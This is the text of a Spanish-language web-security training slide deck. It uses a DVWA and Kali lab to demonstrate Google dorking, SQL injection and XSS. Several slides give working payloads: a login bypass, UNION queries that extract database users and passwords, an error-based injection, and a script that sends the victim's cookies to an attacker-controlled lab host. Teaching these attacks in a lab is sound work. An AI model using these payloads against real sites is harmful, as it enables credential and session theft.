8. Consecuencias:
Surge la necesida de profesionales de la ciberseguridad:
• Auditoría web
• Test de intrusión
• Auditoría de app’s móviles
• Análisis forense
• Análisis de malware
• Etc.
12. Debian + DVWA: Aplicación Web,
entorno para probar ataques y
explotar vulnerabilidades
Kali Linux: Sistema operativo con
multitud de herramientas de
seguridad informática
192.169.233.128 192.169.233.129
15. Operadores (2)
• Inurl y Allinurl: Búsqueda de texto en la URL
• Intext y Allintext: Búsqueda en el texto de una página
• Site: Búsqueda en un sitio especifico
• Link: Búsqueda de páginas que enlazan a un sitio
• Filetype o ext: Búsqueda de ficheros de un tipo específico
16.
17. Ejemplo (1)
inurl:salary inurl:confidential ext:pdf
inurl:/index.htm?cat=info printer Info
inurl:"default.php" intext:"website" "has been successfully
installed on the server!"
23. SQL Injection (1)
Consulta a BD:
select id
from user_table
where Username = '$user'
and Password = '$pass';
24. SQL Injection (2)
$user = admin
$pass = ‘ or ‘1’ = ‘1’; --
select id
from user_table
where Username = 'admin'
and Password = ‘’ or ‘1’ = ‘1’; -- ';
select id
from user_table
where Username = 'admin'
and Password = ‘’ or ‘1’ = ‘1’; -- ';
25. Ejemplo (3)
• %' or '0'='0
• %' union select null, version()#
Ejecutar funciones, ej: version()
• %' union select null, table_name from
information_schema.tables #
Tablas disponibles
26. • %' union select null, concat(first_name,0x0a,
last_name,0x0a,user,0x0a,password) from users #
Profit
• %' union select null, concat(table_name,0x0a,
column_name) from information_schema.columns
where table_name = 'users' #
Columnas de la table users
27. Error-based SQL Injection
… and ‘1’=(select username from users where uid=1)
Resultado:
[ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ‘admin’ to a column of data type int.
28. Blind SQL Injection
No se muestran errores, ¿sigue siendo posible inyectar?
SI
Web que diferencie entre “true” y “false” al realizar la
inyección
31. Cross-Site Scripting (XSS)
• Inyección de código
en la página web:
Javascript, HTML, …
• El navegador de la
victima lo interpreta
como legítimo
32. Ejemplo(5)
XSS Persistente:
• El código se inyecta y queda “almacenado” en la web.
• Cada vez que un usuario accede al recurso, el código se
ejecuta
33. Ejemplo(6)
XSS Reflejado:
• El código se inyecta en los valores que se envían a la web
• <script>new Image().src='http://192.168.233.129/log.php?c='
+document.cookie</script>
34. Cross-Frame Scripting (CFS)
• Incluir el contenido de la web en un frame, dentro
de un dominio ajeno
• Cabecera HTTP X-Frame-Options sin atributo deny
• Ataques sobre usuarios:
– Clickjacking, Keylogger, redirecciones, etc.
35.
36. Ejemplo (7)
• “CFS – Redirección” → Redirigir al hacer click a web arbitraria
• “CFS – Keylogger” → Capturar y enviar a servidor remoto el
texto introducido por teclado